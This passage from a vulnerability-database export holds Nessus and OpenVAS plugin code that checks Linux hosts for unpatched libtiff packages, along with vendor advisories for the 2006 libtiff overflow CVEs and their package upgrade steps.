script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiffxx0c2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.04|5\\.10|6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.04 / 5.10 / 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libtiff-tools\", pkgver:\"3.6.1-5ubuntu0.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libtiff4\", pkgver:\"3.6.1-5ubuntu0.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libtiff4-dev\", pkgver:\"3.6.1-5ubuntu0.6\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libtiff-opengl\", pkgver:\"3.7.3-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libtiff-tools\", pkgver:\"3.7.3-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libtiff4\", pkgver:\"3.7.3-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libtiff4-dev\", pkgver:\"3.7.3-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libtiffxx0c2\", pkgver:\"3.7.3-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libtiff-opengl\", pkgver:\"3.7.4-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libtiff-tools\", pkgver:\"3.7.4-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libtiff4\", pkgver:\"3.7.4-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libtiff4-dev\", pkgver:\"3.7.4-1ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libtiffxx0c2\", pkgver:\"3.7.4-1ubuntu3.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtiff-opengl / libtiff-tools / libtiff4 / libtiff4-dev / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:10:11", "bulletinFamily": "scanner", "description": "This update of libtiff is the result of a source-code audit done by Tavis Ormandy. It fixes various bugs that can lead to denial-of-service conditions as well as to remote code execution while parsing a tiff image. (CVE-2006-3459, CVE-2006-3460, CVE-2006-3461, CVE-2006-3462, CVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\n\nPlease restart your applications.", "modified": "2018-07-19T00:00:00", "id": "SUSE_LIBTIFF-1907.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27334", "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : libtiff (libtiff-1907)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libtiff-1907.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27334);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/07/19 23:54:23\");\n\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n\n script_name(english:\"openSUSE 10 Security Update : libtiff (libtiff-1907)\");\n script_summary(english:\"Check for the libtiff-1907 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of libtiff is the result of a source-code audit done by\nTavis Ormandy. It fixes various bugs that can lead to\ndenial-of-service conditions as well as to remote code execution while\nparsing a tiff image. (CVE-2006-3459, CVE-2006-3460, CVE-2006-3461,\nCVE-2006-3462, CVE-2006-3463, CVE-2006-3464, CVE-2006-3465)\n\nPlease restart your applications.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libtiff packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtiff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtiff-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtiff-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtiff-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"libtiff-3.8.2-5.9\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"libtiff-devel-3.8.2-5.9\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"libtiff-32bit-3.8.2-5.9\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"libtiff-devel-32bit-3.8.2-5.9\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtiff\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:10:32", "bulletinFamily": "scanner", "description": "This update of libtiff is the result of a source-code audit done by Tavis Ormandy. It fixes various bugs that can lead to denial-of-service conditions as well as to remote code execution while parsing a tiff image. (CVE-2006-3459 / CVE-2006-3460 / CVE-2006-3461 / CVE-2006-3462 / CVE-2006-3463 / CVE-2006-3464 / CVE-2006-3465)\n\nPlease restart your applications.", "modified": "2016-09-26T00:00:00", "id": "SUSE_LIBTIFF-1908.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29512", "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : libtiff (ZYPP Patch Number 1908)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29512);\n script_version (\"$Revision: 1.15 $\");\n script_cvs_date(\"$Date: 2016/09/26 13:31:37 $\");\n\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n\n script_name(english:\"SuSE 10 Security Update : libtiff (ZYPP Patch Number 1908)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of libtiff is the result of a source-code audit done by\nTavis Ormandy. It fixes various bugs that can lead to\ndenial-of-service conditions as well as to remote code execution while\nparsing a tiff image. (CVE-2006-3459 / CVE-2006-3460 / CVE-2006-3461 /\nCVE-2006-3462 / CVE-2006-3463 / CVE-2006-3464 / CVE-2006-3465)\n\nPlease restart your applications.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3459.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3460.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3461.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3462.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3463.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3464.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3465.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 1908.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple iOS MobileMail LibTIFF Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"libtiff-3.8.2-5.9\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"libtiff-devel-3.8.2-5.9\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"libtiff-32bit-3.8.2-5.9\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"libtiff-3.8.2-5.9\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"libtiff-devel-3.8.2-5.9\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"libtiff-32bit-3.8.2-5.9\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"libtiff-devel-32bit-3.8.2-5.9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:46", "bulletinFamily": "unix", "description": " [3.5.7-25.el3.4]\n - Fix several vulnerabilities (CVE-2006-3460 CVE-2006-3461\n CVE-2006-3462 CVE-2006-3463 CVE-2006-3464 CVE-2006-3465) ", "modified": "2007-03-22T00:00:00", "published": "2007-03-22T00:00:00", "id": "ELSA-2006-0603", "href": "http://linux.oracle.com/errata/ELSA-2006-0603.html", "title": "libtiff security update ", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:39", "bulletinFamily": "unix", "description": " [3.1.3-3.10]\n - Fix several vulnerabilities (CVE-2006-3460 CVE-2006-3461\n CVE-2006-3462 CVE-2006-3463 CVE-2006-3464 CVE-2006-3465)\n \n [3.1.3-3.9]\n - Fix several vulnerabilities (CVE-2006-3460 CVE-2006-3461\n CVE-2006-3462 CVE-2006-3463 CVE-2006-3464 CVE-2006-3465) ", "modified": "2007-03-22T00:00:00", "published": "2007-03-22T00:00:00", "id": "ELSA-2006-0648", "href": "http://linux.oracle.com/errata/ELSA-2006-0648.html", "title": "kdegraphics security update ", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:45", "bulletinFamily": "unix", "description": "### Background\n\nlibTIFF provides support for reading and manipulating TIFF images. \n\n### Description\n\nTavis Ormandy of the Google Security Team discovered several heap and stack buffer overflows and other flaws in libTIFF. The affected parts include the TIFFFetchShortPair(), TIFFScanLineSize() and EstimateStripByteCounts() functions, and the PixarLog and NeXT RLE decoders. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted TIFF file, resulting in the possible execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll libTIFF users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/tiff-3.8.2-r2\"", "modified": "2006-08-04T00:00:00", "published": "2006-08-04T00:00:00", "id": "GLSA-200608-07", "href": "https://security.gentoo.org/glsa/200608-07", "type": "gentoo", "title": "libTIFF: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:35", "bulletinFamily": "unix", "description": "### Background\n\nlibTIFF provides support for reading and manipulating TIFF images. \n\n### Description\n\nA buffer overflow has been found in the t2p_write_pdf_string function in tiff2pdf, which can been triggered with a TIFF file containing a DocumentName tag with UTF-8 characters. An additional buffer overflow has been found in the handling of the parameters in tiffsplit. \n\n### Impact\n\nA remote attacker could entice a user to load a specially crafted TIFF file, resulting in the possible execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll libTIFF users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/tiff-3.8.2-r1\"", "modified": "2006-07-09T00:00:00", "published": "2006-07-09T00:00:00", "id": "GLSA-200607-03", "href": "https://security.gentoo.org/glsa/200607-03", "type": "gentoo", "title": "libTIFF: Multiple buffer overflows", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:49", "bulletinFamily": "scanner", "description": "The remote host is missing an update to tiff\nannounced via advisory DSA 1137-1.\n\nTavis Ormandy of the Google Security Team discovered several problems\nin the TIFF library. The Common Vulnerabilities and Exposures project\nidentifies the following issues:\n\nCVE-2006-3459\n\nSeveral stack-buffer overflows have been discovered.\n\nCVE-2006-3460\n\nA heap overflow vulnerability in the JPEG decoder may overrun a\nbuffer with more data than expected.\n\nCVE-2006-3461\n\nA heap overflow vulnerability in the PixarLog decoder may allow an\nattacker to execute arbitrary code.\n\nCVE-2006-3462\n\nA heap overflow vulnerability has been discovered in the NeXT RLE\ndecoder.\n\nCVE-2006-3463\n\nAn loop was discovered where a 16bit unsigned short was used to\niterate over a 32bit unsigned value so that the loop would never\nterminate and continue forever.\n\nCVE-2006-3464\n\nMultiple unchecked arithmetic operations were uncovered, including\na number of the range checking operations designed to ensure the\noffsets specified in TIFF directories are legitimate.\n\nCVE-2006-3465\n\nA flaw was also uncovered in libtiffs custom tag support which may\nresult in abnormal behaviour, crashes, or potentially arbitrary\ncode execution.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57205", "id": "OPENVAS:57205", "title": "Debian Security Advisory DSA 1137-1 (tiff)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1137_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1137-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 3.7.2-7.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 3.8.2-6.\n\nWe recommend that you upgrade your libtiff packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201137-1\";\ntag_summary = \"The remote host is missing an update to tiff\nannounced via advisory DSA 1137-1.\n\nTavis Ormandy of the Google Security Team discovered several problems\nin the TIFF library. The Common Vulnerabilities and Exposures project\nidentifies the following issues:\n\nCVE-2006-3459\n\nSeveral stack-buffer overflows have been discovered.\n\nCVE-2006-3460\n\nA heap overflow vulnerability in the JPEG decoder may overrun a\nbuffer with more data than expected.\n\nCVE-2006-3461\n\nA heap overflow vulnerability in the PixarLog decoder may allow an\nattacker to execute arbitrary code.\n\nCVE-2006-3462\n\nA heap overflow vulnerability has been discovered in the NeXT RLE\ndecoder.\n\nCVE-2006-3463\n\nAn loop was discovered where a 16bit unsigned short was used to\niterate over a 32bit unsigned value so that the loop would never\nterminate and continue forever.\n\nCVE-2006-3464\n\nMultiple unchecked arithmetic operations were uncovered, including\na number of the range checking operations designed to ensure the\noffsets specified in TIFF directories are legitimate.\n\nCVE-2006-3465\n\nA flaw was also uncovered in libtiffs custom tag support which may\nresult in abnormal behaviour, crashes, or potentially arbitrary\ncode execution.\";\n\n\nif(description)\n{\n script_id(57205);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1137-1 (tiff)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.7.2-7\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.7.2-7\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.7.2-7\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.7.2-7\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0\", ver:\"3.7.2-7\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-230-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231057306", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231057306", "title": "Slackware Advisory SSA:2006-230-01 libtiff", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_230_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.57306\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2006-230-01 libtiff\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(9\\.0|9\\.1|10\\.0|10\\.1|10\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-230-01\");\n\n script_tag(name:\"insight\", value:\"New libtiff packages are available for Slackware 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix security issues. These issues could be used\nto crash programs linked to libtiff or possibly to execute code as the\nprogram's user.\n\nThanks to Tavis Ormandy and the Google Security Team.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2006-230-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-24T12:50:44", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-230-01.", "modified": "2017-07-07T00:00:00", "published": 